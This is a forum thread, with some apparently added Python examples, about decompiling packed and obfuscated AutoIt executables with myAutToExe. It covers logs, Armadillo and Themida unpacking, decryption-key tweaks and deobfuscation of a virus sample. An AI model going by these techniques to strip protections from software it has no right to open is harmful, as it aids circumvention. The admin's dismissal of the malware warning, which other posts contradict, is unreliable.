Improved AutoIt3 Decompiler / myAutToExe Decompiler


Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Tue Mar 10, 2009 8:04:54 pm

Bad news: I was about to finish a new release - with new features like scanning for / manually entering the script-start AutoIt signature - for better handling of modified au3 exes. But through some bad coincidences it got lost, i.e. I need to reprogram it. So here is how it happened:

1. In VB6 I normally set the option to 'save the project each time before I start/compile it', but since I was on another computer the default 'When the program starts - Don't save' was active.
2. I didn't save from time to time, and also not before sending the system to hibernation.
3. I switched off the power 2-3 seconds too early - before the RAM->HD save was complete.
And so I couldn't resume anymore and had to reboot - and of course lost all unsaved work. :|

I'm writing this so you know, and so you can maybe avoid a painful repetition of this lesson.
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby Nodens » Thu Mar 19, 2009 11:54:05 am

Hello,

I've been trying to decompile an AutoIt script that's been compiled with 3.2.10.0 and packed with Themida 1.945.
This is the log:
Code:
================================================================================
myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.5 build(98)
================================================================================
Unpacking: X:\GLoader\package\gloader_orig.exe
Scanning for AutoIt Signature: A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D    £HKΎ˜lJ©™LS
†ΦH}

---> ScriptStartOffset: 000EE200
      EndOf_PE-ExeFile : 000EE200
Extracting ExeIcon/s to: "X:\GLoader\package\gloader_orig.ico"
000EE213 -> SubType: 0x41  AU3!
~ Note:  The following offset values are were the data ends (and not were it starts) ~
000EE217 -> New tokenised AutoIt script found.
Script is password protected!
000EE227 -> Password/MD5PassphraseHash: 83566369BAF550CD75A7CF9B91F2AB5A
            ƒVciΊυPΝu§Ο›‘ς«Z
MD5PassphraseHash_ByteSum: 00000000  '+ 2477' => decryption key!
------------ Processing Body -------------
=== > Processing FILE: #1
000EE22B -> ResType: FILE
000EE255 -> SrcFile_FileInst: >>>AUTOIT SCRIPT<<<
000EE2B7 -> CompiledPathName: L:\Users\Someone\AppData\Local\Temp\autE8C9.tmp
000EE2B8 -> IsCompressed: True  (01)
000EE2BC -> ScriptSize Compressed: 0000AF44  Decimal:44868
000EE2C0 -> ScriptSize UnCompressed(used to seek to next file): 000391D0  Decimal:233936
000EE2C4 -> ADLER32 CRC of unencrypted script data: 2089B60E
000EE2D4 -> FileTime (number of 100-nanosecond intervals since January 1, 1601)
    pCreationTime:  01C92F5D636ACE34  16.10.2008 7:4:10 [317]
    pLastWrite   :  01C92F5D639486AC  16.10.2008 7:4:10 [591]
000EE2D4 -> Begin of script data
Decrypting script data...
Calculating ADLER32 checksum from decrypted scriptdata
   OK.
JB LZSS Signature:EA06
Compressed scriptdata written to X:\GLoader\package\gloader_orig.pak
Expanding script data to "gloader_orig.tok" at X:\GLoader\package\
Can't open X:\GLoader\package\gloader_orig.tok for read/write access. File not found

Saving Logdata to : X:\GLoader\package\gloader_orig_myExeToAut.log


I have been working a few days now on unpacking it from Themida (I'm guessing that's what messes up the decompiler), but it's beginning to get quite the hassle and I need to decompile that script faster. I am up to the point where I have a dump that seems like it contains the AutoIt code but isn't working (I'm guessing there's still something wrong with the OEP), but in theory the script should be extractable from there (if I understood the info you have already provided correctly). The dump is not recognized by the decompiler, probably due to a corrupted or missing signature...

I have uploaded both the original packed script executable and my latest PE dump of the unpacking process here:
http://rapidshare.com/files/210990529/package.rar

I would appreciate any help:)
Nodens


EDIT: I found out something interesting: your decompiler can actually decompile the script perfectly IF it's not run on Vista x64. So it's either not compatible with x64 or something on Vista. I tried it on my VMware 32-bit XP VM that I use for RE and it worked fine there...
Nodens
AntiWPA Newbie
Posts: 2
Joined: Thu Mar 19, 2009 11:39:49 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Mon Mar 23, 2009 1:51:56 pm

Code:
Expanding script data to "gloader_orig.tok" at X:\GLoader\package\
Can't open X:\GLoader\package\gloader_orig.tok for read/write access. File not found

To decompress the script data myAutToExe uses 'LZSS.exe'. It seems that this doesn't run under Vista x64. Please check this. ('LZSS.exe' is a console app, so run it under cmd.exe to see its output.)
I guess Vista is somehow more strict about PE files, or doesn't support align:0x400 - in the next release I'll remove these compile options: "/merge:.rdata=.text /merge:.data=.text /Section:.text,ERW /align:0x400"
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby rager » Fri Mar 27, 2009 10:47:46 pm

O.o Should we anticipate this release? I cannot wait, I'm anticipating already lol
rager
AntiWPA Newbie
Posts: 1
Joined: Wed Feb 25, 2009 1:55:12 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby Nerdmaster » Sat Mar 28, 2009 2:54:18 am

First off, I'm a big fan of this project. Not a lot of people realize how important it can be to allow reverse-engineering (for fun, education, and/or security purposes).

I cannot for the life of me get the current version to work on a particular application. The author has hidden serious malware in his programs in the past (http://forums.gleemax.com/showthread.php?t=1117133), but he seems to have gotten much smarter since this exploit was found. For starters, he's actually the first person I saw using an obfuscator that did the funny variable names described earlier (all names were a combination of the letter "O" and the number 0). More recently, either he's gotten a new packer that myAutToExe isn't able to handle, or a newer version of AutoIt has done something differently. Either way, I can't decompile this software.

Here's my log:

Code:
================================================================================
myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< 2.5 build(99)
================================================================================
Unpacking: C:\Program Files\CBS Soft\CBS Bot\LauncherGUI.exe
AlternativeSigScan for 'FILE'-signature in au3-body...
Scanning for FILE-(old)signature: FF 6D B0 CE    ÿm°Î
...not found.
Scanning for FILE-(new)signature: 6B 43 CA 52    kCÊR
Modified Script Type 3.2.5+ found.
001665A9 -> SrcFile_FileInst: >>>AUTOIT SCRIPT<<<
Seeking back to script start position...
AU3_Signature: A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D   £HK¾˜lJ©™LS
†ÖH}

---> ScriptStartOffset: 00166554
      EndOf_PE-ExeFile : 00241000
Extracting ExeIcon/s to: "C:\Program Files\CBS Soft\CBS Bot\LauncherGUI.ico"
00166567 -> SubType: 0x41  AU3!
~ Note:  The following offset values are were the data ends (and not were it starts) ~
0016656B -> New tokenised AutoIt script found.
Script is password protected!
0016657B -> Password/MD5PassphraseHash: 0FD541DCE80C340668C9A0A749FBC7EB
            ÕAÜè 4hÉ §IûÇë
MD5PassphraseHash_ByteSum: 00000000  '+ 2477' => decryption key!
------------ Processing Body -------------
=== > Processing FILE: #1
0016657F -> ResType: FILE
001665A9 -> SrcFile_FileInst: >>>AUTOIT SCRIPT<<<
00166603 -> CompiledPathName: C:\DOCUME~1\Alberto\LOC繽椾ᰳ䡹递誶칥㖽뎅棘琰ﶼ캖䘰⽁᷌
00166604 -> IsCompressed: True  (46)
00166608 -> ScriptSize Compressed: B83686B4  Decimal:-1204386124
0016660C -> ScriptSize UnCompressed(used to seek to next file): 816F87B1  Decimal:-2123397199
00166610 -> ADLER32 CRC of unencrypted script data: CBF7A6C6
00166620 -> FileTime (number of 100-nanosecond intervals since January 1, 1601)
    pCreationTime:  AE976307913C01C9  0.0.0 0:0:0 [0]
    pLastWrite   :  AE97851EEC7001C9  0.0.0 0:0:0 [0]
00166620 -> Begin of script data
Invalid procedure call or argument

Saving Logdata to : C:\Program Files\CBS Soft\CBS Bot\LauncherGUI_myExeToAut.log


That "Invalid procedure call or argument" totally stumped me. It's also clear that something else is going on here, what with the corrupt path name. I tried to use VB6 to step through the code and see what was going on, but I had no luck with that - for some reason I just can't get that portable runtime to work for me (it crashes trying to display the main form). I then tried to use Olly to pull out the script data while it was running, but I didn't really have any luck there either. I couldn't really figure out exactly what to grab.

Attached is the executable (7-zipped) I'm dealing with. I'd love to know what I'm missing here. Is the bot author being clever and finding better ways to hide his malware, or is it just something stupid I'm doing?
Nerdmaster
AntiWPA User
Posts: 6
Joined: Sat Dec 08, 2007 12:00:48 pm
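
The two logs posted so far differ in a way that is worth checking before blaming the decompiler. In Nodens' log the ScriptStartOffset (000EE200) equals EndOf_PE-ExeFile, i.e. the AutoIt script is an overlay appended after the last PE section, which is how a normal compiled AutoIt exe looks. In Nerdmaster's log the signature is found at 00166554 inside an image that ends at 00241000, and the header fields that follow decode to nonsense: negative sizes, a garbled CompiledPathName, and FileTime values printed as 0.0.0. The Python below is an added example for this thread, not code from myAutToExe: it computes the end of the last PE section, locates the 16-byte AU3 signature and the old/new FILE signatures quoted in the logs, and decodes FILETIME fields with a plausibility check. The minimal PE it builds is constructed for the demonstration; the AutoIt header itself is not parsed, because its fields are encrypted and the decryption is not described on this page.

```python
"""Sanity checks on a suspected compiled-AutoIt executable.

Added example for this thread, not code from myAutToExe.  The three
signatures are copied from the logs above; the sample PE is constructed.
"""
import struct
from datetime import datetime, timedelta, timezone

# "Scanning for AutoIt Signature: A3 48 4B BE 98 6C 4A A9 99 4C 53 0A 86 D6 48 7D"
AU3_SIG = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")
# "Scanning for FILE-(old)signature: FF 6D B0 CE" / "FILE-(new)signature: 6B 43 CA 52"
FILE_SIG_OLD = bytes.fromhex("FF6DB0CE")
FILE_SIG_NEW = bytes.fromhex("6B43CA52")

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def pe_end_of_image(data: bytes) -> int:
    """File offset where the last section's raw data ends ("EndOf_PE-ExeFile")."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    section_table = coff + 20 + opt_size
    end = 0
    for i in range(num_sections):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each 40-byte entry
        raw_size, raw_ptr = struct.unpack_from("<II", data, section_table + i * 40 + 16)
        if raw_size:  # sections without raw data (e.g. .bss) do not extend the file
            end = max(end, raw_ptr + raw_size)
    return end


def locate_script(data: bytes) -> dict:
    """Find the AU3 signature and report whether it sits in the overlay (a normal
    compiled AutoIt exe) or inside the mapped image (packer stub or memory dump)."""
    end = pe_end_of_image(data)
    start = data.find(AU3_SIG)
    return {
        "end_of_pe": end,
        "script_start": start,
        "in_overlay": None if start < 0 else start >= end,
        "file_sig_old": data.find(FILE_SIG_OLD),
        "file_sig_new": data.find(FILE_SIG_NEW),
    }


def filetime_to_datetime(ft: int):
    """Decode a FILETIME (100 ns ticks since 1601-01-01 UTC).  Returns None for
    values that cannot be a real timestamp, which is what a header that is still
    encrypted or misaligned produces (the '0.0.0 0:0:0' lines in the second log)."""
    try:
        dt = FILETIME_EPOCH + timedelta(microseconds=ft // 10)
    except OverflowError:
        return None
    if not 1980 <= dt.year <= 2100:
        return None
    return dt


def build_sample_pe(script_in_overlay: bool) -> bytes:
    """Constructed minimal PE: one section whose raw data occupies 0x200..0x400."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew
    opt_size = 0xE0                                    # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    section = bytearray(40)
    section[:5] = b".text"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", section, 8, 0x200, 0x1000, 0x200, 0x200)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + bytes(section)
    image = bytearray(0x400)
    image[:len(header)] = header
    if script_in_overlay:
        return bytes(image) + AU3_SIG + bytes(32)      # signature appended after the image
    image[0x280:0x280 + len(AU3_SIG)] = AU3_SIG        # signature buried inside a section
    return bytes(image)


if __name__ == "__main__":
    for overlay in (True, False):
        print(locate_script(build_sample_pe(overlay)))
    print(filetime_to_datetime(0x01C92F5D636ACE34))   # value from Nodens' log
    print(filetime_to_datetime(0xAE976307913C01C9))   # value from Nerdmaster's log
```

When `in_overlay` is False on a file that is not a memory dump you made yourself, the stub has been wrapped by a packer and the bytes after the signature are not what the decompiler expects, which is the situation cw2k diagnoses as Armadillo a few posts further down.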

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby Nodens » Sat Mar 28, 2009 12:46:00 pm

cw2k wrote:
Code:
Expanding script data to "gloader_orig.tok" at X:\GLoader\package\
Can't open X:\GLoader\package\gloader_orig.tok for read/write access. File not found

To decompress the script data myAutToExe uses 'LZSS.exe'. It seems that this doesn't run under Vista x64. Please check this. ('LZSS.exe' is a console app, so run it under cmd.exe to see its output.)
I guess Vista is somehow more strict about PE files, or doesn't support align:0x400 - in the next release I'll remove these compile options: "/merge:.rdata=.text /merge:.data=.text /Section:.text,ERW /align:0x400"


Correct. LZSS.exe won't run on my Vista x64 rig :)
Nodens
AntiWPA Newbie
Posts: 2
Joined: Thu Mar 19, 2009 11:39:49 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Wed Apr 01, 2009 3:24:30 am

@Nerdmaster
LauncherGUI.exe is packed with Armadillo. Yes, I know the way to unpack this is a little 'Nerd like', but since... hehe :lol:. I wrote how to do it in some previous post.
And about that malware post (warning) - yes, of course that is possible. But if it's possible to get hit by lightning in a storm, that's no reason that this MUST happen. In my eyes that post is bullshit, people 'concerned' about security to make themselves more important (or sometimes to distract attention from something they'd like to hide).

@Nodens
Vista *urgh* :roll:
I'm currently not on my home PC where I have VC++ installed. If you need it that quick, compile it yourself or find someone who can do this for you.
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby zebrastation2009 » Wed Apr 01, 2009 11:16:40 am

Hi

This is strange for me.

I read all the notes about the Armadillo pack in readme.txt and failed about 10 times.

Has someone unpacked this file? Please guide me step by step so I can redo it myself.
zebrastation2009
AntiWPA Newbie
Posts: 1
Joined: Wed Apr 01, 2009 10:56:00 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby Nerdmaster » Thu Apr 02, 2009 2:11:34 am

cw2k wrote:@Nerdmaster
LauncherGUI.exe is packed with Armadillo. Yes, I know the way to unpack this is a little 'Nerd like', but since... hehe :lol:. I wrote how to do it in some previous post.
And about that malware post (warning) - yes, of course that is possible. But if it's possible to get hit by lightning in a storm, that's no reason that this MUST happen. In my eyes that post is bullshit, people 'concerned' about security to make themselves more important (or sometimes to distract attention from something they'd like to hide).


First, yes, I know unpacking is easy (and nerdy), and this wouldn't present a problem if I knew what I was doing. My problem is that I don't seem to be able to figure out how to do this. I tried to follow your guide, but I guess I don't know quite how to use Olly to get all the data.

As for the malware post, you'll have to take my word on it. I'm the one who discovered the malware in the first place: http://forums.gleemax.com/showthread.php?t=1099233. The old versions of the code I gave you had some pretty interesting exploits for stealing user accounts. In fact it's for reasons like this that I continue to try and unpack this source. For a while, the bot would actually contact a website and send over your user and password information in plain text!
Nerdmaster
AntiWPA User
Posts: 6
Joined: Sat Dec 08, 2007 12:00:48 pm

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby zutto » Sun Apr 05, 2009 2:14:17 am

Hi

I am having problems decompiling a "bot" for me; I want to sneak a peek at the source, since I am interested in the rotation function, but I have had no success decompiling it, so I thought you could help me a bit :)

Thanks.
zutto
AntiWPA Newbie
Posts: 3
Joined: Sun Apr 05, 2009 1:21:04 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby Nerdmaster » Mon Apr 06, 2009 9:54:34 am

Never mind - I must have been missing something obvious. I just pulled memory from Olly and ran it through myAutToExe without any problems. Guess I was having a bad day or something :)
Nerdmaster
AntiWPA User
Posts: 6
Joined: Sat Dec 08, 2007 12:00:48 pm

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Wed Apr 08, 2009 11:10:46 pm

Since so many people asked me about it, I finally made a step-by-step manual on how to dump AutoIt scripts that were packed by Armadillo.
http://myauttoexe.angelfire.com/Doc/Dum ... adillo.htm

I also just uploaded a new version of myAutToExe with the new 'Regular Expression Renamer'. With this you are able to rename obfuscated names like
Code:
Global $000000000000000000 = "loading.jpg"
Global $0000000000000O0O00 = "S00000000OOO0OO00OOO00: Non corrispondono il nome in $0000000000O0O0OO00O00 ,"

to
Code:
Global $gStr0000 = "loading.jpg"
Global $gStr0001 = "Func0000: Non corrispondono il nome in $GUI_0000 ,"

by the use of regular expressions.
:D
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby Nerdmaster » Thu Apr 09, 2009 4:01:47 am

cw2k wrote:Since so many people asked me about it, I finally made a step-by-step manual on how to dump AutoIt scripts that were packed by Armadillo.
http://myauttoexe.angelfire.com/Doc/Dum ... adillo.htm


This is excellent, thank you! I figured it out on my own, but this guide will definitely help people out a lot.

cw2k wrote:I also just uploaded a new version of myAutToExe with the new 'Regular Expression Renamer'.


I think there's something buggy with the renaming, as it wasn't able to catch all the variables in a test script I put together. I'll attach my simplistic example.

You should know I've got something very similar put together in Ruby. It doesn't rename functions (hopefully I can do that soon), but it renames variables in a relatively intelligent manner. For instance, if $O00OOO0000OO is set to "Loading...", and it is never assigned to anything but "Loading...", the variable is ripped out and placed in-line rather than being a variable.

I'll happily link my article if you're interested, but I didn't want it to seem like I was trying to step on your toes.
Nerdmaster
AntiWPA User
Posts: 6
Joined: Sat Dec 08, 2007 12:00:48 pm

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Thu Apr 09, 2009 4:56:29 am

zutto wrote:I am having problems decompiling a "bot" for me...
Hmm, the same modification as WoWInfinity uses. Change the FILE decryption key (that is normally 0x18EE) to 0x0000, or download the newest myAutToExe I just uploaded. I improved some small things that make it cope better with mods like this. :)

Ah yes, and just so you know, via Google I found where that file comes from:
http://www.autoitscript.com/forum/index ... t&p=628182
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby zutto » Sat Apr 11, 2009 10:50:40 pm

cw2k wrote:
zutto wrote:I am having problems decompiling a "bot" for me...
Hmm, the same modification as WoWInfinity uses. Change the FILE decryption key (that is normally 0x18EE) to 0x0000, or download the newest myAutToExe I just uploaded. I improved some small things that make it cope better with mods like this. :)

Ah yes, and just so you know, via Google I found where that file comes from:
http://www.autoitscript.com/forum/index ... t&p=628182


Works like a charm, thanks!

Is there a way to deobfuscate scripts that are already .au3 [+ .tbl]?
zutto
AntiWPA Newbie
Posts: 3
Joined: Sun Apr 05, 2009 1:21:04 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Sun Apr 12, 2009 3:00:06 am

zutto wrote:Is there a way to deobfuscate scripts that are already .au3 [+ .tbl]?

I'm currently working on better & faster deobfuscation - and just uploaded this new version. Hehe, feel free to be a beta tester. :D
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby zutto » Sun Apr 12, 2009 5:07:54 pm

cw2k wrote:
zutto wrote:Is there a way to deobfuscate scripts that are already .au3 [+ .tbl]?

I'm currently working on better & faster deobfuscation - and just uploaded this new version. Hehe, feel free to be a beta tester. :D


It didn't work better than the earlier version :/..

It's still leaving me all this crap.

Got any tips for getting that crap out and making the script work without editing 60000 lines by hand?

http://pastebin.com/m112de9ea
zutto
AntiWPA Newbie
Posts: 3
Joined: Sun Apr 05, 2009 1:21:04 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby sarm2005 » Tue Apr 14, 2009 10:31:11 pm

Hi, I would first like to say this decompiler is very useful and I have been having lots of success using it.

However I am having trouble decompiling the attached ahk script. Any help would be appreciated. Thanks.
sarm2005
AntiWPA Newbie
Posts: 1
Joined: Tue Apr 14, 2009 6:31:26 am

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby falseaccount » Tue Apr 21, 2009 8:33:40 pm

Hello,

First, thanks for this useful program :) it is the best in its class (I do not know any others).

I'm using version 2.7.0.104 of myAutToExe and I am trying to decompile this .exe, compiled with the oldest version of AHK, 1.0.47.6:
file1.7z
and it's not working.
The .log file:
myExeToAut.7z

If you have a moment, can you look at this please?

Thank you ;)
falseaccount
AntiWPA Newbie
Posts: 3
Joined: Tue Apr 21, 2009 8:07:01 pm

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Wed Apr 22, 2009 3:07:28 pm

sarm2005 wrote:Hi, I would first like to say this decompiler is very useful and I have been having lots of success using it.

However I am having trouble decompiling the attached ahk script. Any help would be appreciated. Thanks.

Thanks for pointing that out. It was only a minor bug - however, download the current version, now it's working.
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Wed Apr 22, 2009 5:20:04 pm

falseaccount wrote:I'm using version 2.7.0.104 of myAutToExe and I am trying to decompile this .exe, compiled with the oldest version of AHK, 1.0.47.6:
file1.7z
and it's not working.

Here it's working; also, I can't see any problems in your log.
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Thu Apr 23, 2009 2:08:22 am

Nerdmaster wrote:
cw2k wrote:I also just uploaded a new version of myAutToExe with the new 'Regular Expression Renamer'.


I think there's something buggy with the renaming, as it wasn't able to catch all the variables in a test script I put together. I'll attach my simplistic example.

Nice. I'll add that as a test example.
Well, the example expression given in myAut2Exe was
"S[O0]{21}" -> "Func"
which will only catch strings that are 21 chars long.

"S[O0]{1,21}" -> "Func" is more generic - but it will also catch false positives:
Global $Var000C = "Sorry" <- before
Global $Var000C = "Func0001rry" <- after

but a RegExp term like this:
"S[O0]{14,21}" -> "Func"
should work fine.

Nerdmaster wrote:You should know I've got something very similar put together in Ruby. It doesn't rename functions (hopefully I can do that soon), but it renames variables in a relatively intelligent manner. For instance, if $O00OOO0000OO is set to "Loading...", and it is never assigned to anything but "Loading...", the variable is ripped out and placed in-line rather than being a variable.

I'll happily link my article if you're interested, but I didn't want it to seem like I was trying to step on your toes.

I found your article after I made the RegExp Renamer module. Ruby is for Linux - and for all the Windows users and people that are too lazy to boot up their Ubuntu, Debian, ...: is there a Ruby interpreter/compiler for Windows? (Include a link to your post so it is easier to use for newbies.) I had a look at the script without running it - looks nice.

And about replacing consts, hmm, regarding the example:
Const $O00OOO0000OO ="Loading..."
Well, naming it $Str_Loading (and ensuring that's unique) instead of a not so descriptive name like $Str_0001 would be nice. But replacing all $O00OOO0000OO with "Loading..." - these consts were made by the developer and not the obfuscator, so they have their reason (maybe to make it easier to translate the app).

Anyway, nice to see other people out there that 'create'. :D
cw2k
Site Admin
Posts: 363
Joined: Sun Aug 14, 2005 3:24:41 pm
Location: ...
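
cw2k's 'Regular Expression Renamer' post and the false-positive discussion in the reply just above ("S[O0]{1,21}" turning "Sorry" into "Func0001rry") can both be reproduced with a few lines. The Python below is an added example for this thread, not code from myAutToExe or from Nerdmaster's Ruby script. Each rule is a regex plus a prefix; every distinct match is renamed to the prefix and a four-digit hex counter in order of first appearance. Matching is case-insensitive, which is an assumption implied by the "So" in "Sorry" matching [O0] in cw2k's example, and an optional mode leaves string literals untouched. The sample script is constructed from the identifiers quoted in the posts.

```python
"""Regex-based renaming of obfuscated AutoIt identifiers.

Added example for this thread; not code from myAutToExe or from Nerdmaster's
Ruby script.  The sample script is constructed from names quoted in the posts.
"""
import re

# A rule is (regex, prefix): every distinct match of the regex is replaced by
# prefix + 4-digit hex counter, numbered in order of first appearance.
DEFAULT_RULES = [
    (r"\$[O0]{10,}", "$gStr"),   # obfuscated variables: $ followed by a run of O/0
    (r"S[O0]{14,21}", "Func"),   # obfuscated functions, cw2k's tightened bound
]

# AutoIt string literals: "..." or '...'.  An embedded quote is doubled, which
# this pattern simply sees as two adjacent literals, so they are still skipped.
AU3_STRING = re.compile(r'"[^"]*"|\'[^\']*\'')

# Constructed sample built from the identifiers quoted in the thread.
SAMPLE = (
    'Global $000000000000000000 = "loading.jpg"\n'
    'Global $0000000000000O0O00 = "S00000000OOO0OO00OOO00: Non corrispondono il nome in $0000000000O0O0OO00O00 ,"\n'
    'Global $Var000C = "Sorry"\n'
    'Func S00000000OOO0OO00OOO00($0000000000O0O0OO00O00)\n'
    '    Return $0000000000O0O0OO00O00 & $000000000000000000\n'
    'EndFunc\n'
)


def rename_obfuscated(source: str, rules=DEFAULT_RULES, skip_strings: bool = False) -> str:
    """Apply the rules to `source`.  With skip_strings=False (the behaviour
    discussed in the thread) names inside string literals are renamed too, which
    is what lets a loose regex mangle ordinary text such as "Sorry".  With
    skip_strings=True the literals are copied through untouched."""
    # Case-insensitive matching is an assumption, implied by the "So" of
    # "Sorry" matching [O0] in cw2k's example.
    compiled = [(re.compile(rx, re.IGNORECASE), prefix, {}) for rx, prefix in rules]

    def rename_code(chunk: str) -> str:
        for regex, prefix, seen in compiled:
            def replace(m, prefix=prefix, seen=seen):
                name = m.group(0)
                if name not in seen:                      # first sighting gets the next number
                    seen[name] = f"{prefix}{len(seen):04X}"
                return seen[name]
            chunk = regex.sub(replace, chunk)
        return chunk

    if not skip_strings:
        return rename_code(source)
    out, pos = [], 0
    for literal in AU3_STRING.finditer(source):
        out.append(rename_code(source[pos:literal.start()]))   # code between literals
        out.append(literal.group(0))                           # literal kept verbatim
        pos = literal.end()
    out.append(rename_code(source[pos:]))
    return "".join(out)


if __name__ == "__main__":
    print(rename_obfuscated(SAMPLE))
    # cw2k's over-generic bound: "Sorry" becomes "Func0001rry"
    print(rename_obfuscated(SAMPLE, [(r"\$[O0]{10,}", "$gStr"), (r"S[O0]{1,21}", "Func")]))
    print(rename_obfuscated(SAMPLE, skip_strings=True))
```

Whether to rename inside strings is a judgement call rather than a bug: cw2k's own example deliberately rewrites the function name inside the message string, since obfuscated scripts do refer to functions by name in strings (for Call or Execute), so the string-skipping mode trades that coverage for protection against the "Sorry" class of false positive. Tightening the repetition bound, as cw2k suggests, addresses the same problem without giving up renaming inside strings.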

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby falseaccount » Thu Apr 23, 2009 2:29:01 am

cw2k wrote:
falseaccount wrote:I'm using version 2.7.0.104 of myAutToExe and I am trying to decompile this .exe, compiled with the oldest version of AHK, 1.0.47.6:
file1.7z
and it's not working.

Here it's working; also, I can't see any problems in your log.


Thanks for the script.

Usually it works with other scripts, but this one I cannot decompile; I don't know why it's working for you :shock:
falseaccount
AntiWPA Newbie
Posts: 3
Joined: Tue Apr 21, 2009 8:07:01 pm

Re: Improved AutoIt3 Decompiler / myAutToExe Decompiler

Postby cw2k » Thu Apr 23, 2009 3:46:50 am

pandora7 wrote:Thanks for the great decompiler!
I obtained a virus which is not detected by Symantec.
The free scanner "CureIt" from Dr. Web classified it as "Win32.HLLW.Autoruner.based".
I sent this virus sample to Symantec on 02-Feb-09, but a week passed; they only added it in the week of 10-Feb-09...

This virus is an exe file, packed by UPX 3.0:
csrcs.zip
Finally I've had some time to look at this. :)
This file is obfuscated twice: the second 'layer' is Van Zande 1.0.24
and the first is EncodeIt 2.0.

The major problem is/was EncodeIt 2.0, since it is more uncommon, and at the time it was used there were no tokenized scripts or other obfuscators.
For example, all EncodeIt scripts started like this:
Global Const $M8D5A7A2F6C5B4F29 = Int(99/3+15*100/4-13^2+81/3-17-245+99/3+15*100/4-13^2+81/3-17)
so I made myAutToExe use "Int(99/3+15*100/4-13^2+81/3-17-245+99/3+15*100/4-13^2+81/3-17)" to recognize EncodeIt scripts.
But when I decided to detokenise numbers into hex it became this:
Global Const $gConst0000 = Int(0x0063 / 3 + 0x000F * 0x0064 / 4 - 0x000D ^ 2 + 0x0051 / 3 - 0x0011 - 0x00F5 + 0x0063 / 3 + 0x000F * 0x0064 / 4 - 0x000D ^ 2 + 0x0051 / 3 - 0x0011)
and so EncodeIt wasn't recognized anymore.

There were also other things, like strings that were always 'single quoted' but now become "double quoted" - however.

Code:
Deobfuscating Encodeit 2.0...
Renaming Consts...
Renaming Dims...
Renaming Globals...
Search'n'replace strings:
$gConst0002    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419395F01C914AD60EB673C15FCBFBF3EC34271B8624D15A1ED50CCF86D78DD67A7A1A9DE123A6219AF1EF57624D6E9C92039C534AF51C8BDA73AFFC6262E0C1C1DDB7E5C73935413F9FD764317C4DD0133331AFBED6B4DE974FDD160BCE2C3E502C8EC3FAE8D5B7E327E509"
$gConst0003    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB81075419290F01C914ADC0EB50FB95FCAFCF4EC35271A8624D15A1ED50CC786D78DD77A79649AE123A6569AF6EF59624D6EEB95749C554A8E1CF9DA72AF8C1E10E0C1C1DDB79DC73D35343F9CD76B317C48D5133331ACBED3B1DA9737D8130BC92B3D502CF2B0"
$gConst0004    "408178571CB7BBE0DC1D7B2D0C42B9AEF2F90AEEB154D0C5BCB8107540E390F21C914AAD0EB773C55FCBFBF0EC36271F8623D1261ED10BCF86D48DA37A79649BE124A6209D82EF21624D6E9F92039D524AF51C8ADA73D1F96262E0C1C1DDB79DC73D35453F9CD010317C48D4134E31AFBED7B1DC974FDD160BCA2B4D"
